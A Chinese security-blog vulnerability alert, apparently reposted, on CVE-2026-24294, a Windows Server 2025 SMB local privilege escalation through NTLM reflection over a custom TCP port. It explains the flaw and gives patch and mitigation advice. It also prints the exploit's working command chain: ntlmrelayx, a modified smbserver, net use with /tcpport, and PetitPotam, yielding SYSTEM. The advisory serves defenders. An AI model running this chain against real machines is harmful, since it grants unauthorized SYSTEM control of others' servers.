文章总结: WindowsServer2025SMB服务存在本地提权漏洞CVE-2026-24294,利用脚本已公开。漏洞源于新SMB客户端任意端口特性与多路复用机制结合,导致低权限用户可通过NTLM反射攻击获取SYSTEM权限。影响Server2025默认配置,Windows1124H2因强制SMB签名不受影响。建议立即安装8月补丁,或启用SMB签名并阻断RPC端口。 综合评分: 89 文章分类: 漏洞预警,漏洞分析,应急响应,安全建设
【漏洞预警】紧急排查,SMB服务再曝新漏洞,利用脚本已公开
YGnight YGnight
night安全
2026年8月11日 08:10 四川
在小说阅读器读本章
去阅读
SMB的CVE-2026-24294漏洞利用脚本已经公开,这个漏洞是 Windows Server 2025 SMB服务的一个本地提权漏洞,利用普通用户可以提权获取SYSTEM 权限。
一、漏洞情报
Windows Server 2025的SMB 客户端多了个特性,当远程共享的时候,能指定走哪个 TCP 端口,不再锁死 445。
net use \\host\share /tcpport:12345
这个功能是没有问题的,但是这个功能和SMB 会话多路复用的老机制的结合就导致了问题。SMB2 协议里写着同一条 TCP 连接上能塞好几条会话,后开的会话复用这条已建立的连接,不用再新建。这两条结合就导致了本地一个低权限用户可以实现提权获取 SYSTEM 。
漏洞涉及版本:
| 版本 | 中招情况 | | — | — | | Windows Server 2025 | 中招(默认配置) | | Windows 11 24H2 | 不通——强制 SMB 签名,relay 被挡 |
二、漏洞原理
这个漏洞的利用核心是 NTLM 反射,NTLM 是 Windows 鉴权协议,机器之间互相验身份靠它。而利用的反射攻击就是逼对方把鉴权数据发给一个攻击者控制的服务器,拿着这数据回头再发给真服务器,冒充登录。微软早年堵了不少这种路,方法主要是给 SMB 加了签名,杜绝了同名反射问题。
对脚本进行分析后,发现攻击者是先在本地起一个自己控制的 SMB 服务器,监听一个非 445 的端口,比如 12345。接着逼 SYSTEM 权限的进程把 NTLM 鉴权数据发到这个端口上。最后把这数据接到relay 回本机真正的 445 SMB 服务。
利用脚本的关键部分:
# 终端 1 · ntlmrelayx 在 6666 收 NTLM,relay 回本机 445,落地跑 whoami
python ntlmrelayx.py --no-smb-server --no-http-server --no-wcf-server \
--no-winrm-server --no-rpc-server --no-mssql-server --no-rdp-server \
-t smb://127.0.0.1 -c "whoami" -smb2support --raw-port 6666
# 终端 2 · 改过的 smbserver,在 12345 听着,抓到 NTLM 转发给 6666
python smbserver.py test . -port 12345 -smb2support \
-username user -password user -relay-port 6666
# 终端 3 · 先挂共享开一条到 12345 的连接,再压 LSASS 去鉴权
net use \\127.0.0.1\test /tcpport:12345 /user:user user
PetitPotam.exe 127.0.0.1 localhost 2
三件事协同:ntlmrelayx 在那头等着接力;smbserver 在 12345 假装 SMB 服务器,抓到 LSASS 送来的那条 NTLM 鉴权数据就转给 ntlmrelayx;终端 3 那条 net use 是事先把一条到 12345 的 TCP 连接挂那儿等着被复用,PetitPotam 那条是逼 LSASS 出手。ntlmrelayx 拿到 SYSTEM 的 NTLM 数据,relay 回 127.0.0.1:445 真服务,冒 SYSTEM 登录,-c "whoami" 落地跑一下,屏幕上吐出来的就是 nt authority\system——SYSTEM 拿到手。
微软官方堵的是同一条 445 连接里 NTLM 不能回头反射给自己,Server 2025 新加的任意端口 SMB 客户端特性,把这条反射路挪到非 445 端口,从而可以实现绕过官方的防御机制。新功能跟会话多路复用那条老机制撞一块,就导致了问题的形成。本意给管理员方便的特性,被凑着用成了本地普通用户到 SYSTEM 的直达路。
三、修复建议
-
重点排查Server 2025,将8月的补丁打上,CVE-2026-24294漏洞在 MSRC 公告里对应有补丁包。
暂时无法升级补丁,可以先将能开 SMB 签名的全开;设置防火墙阻断 RPC 端口。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:night安全 YGnight YGnight《【漏洞预警】紧急排查,SMB服务再曝新漏洞,利用脚本已公开》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。






![[NewStarCTF2023公开赛道]游戏高手](/images/random/titlepic/11.jpg)



评论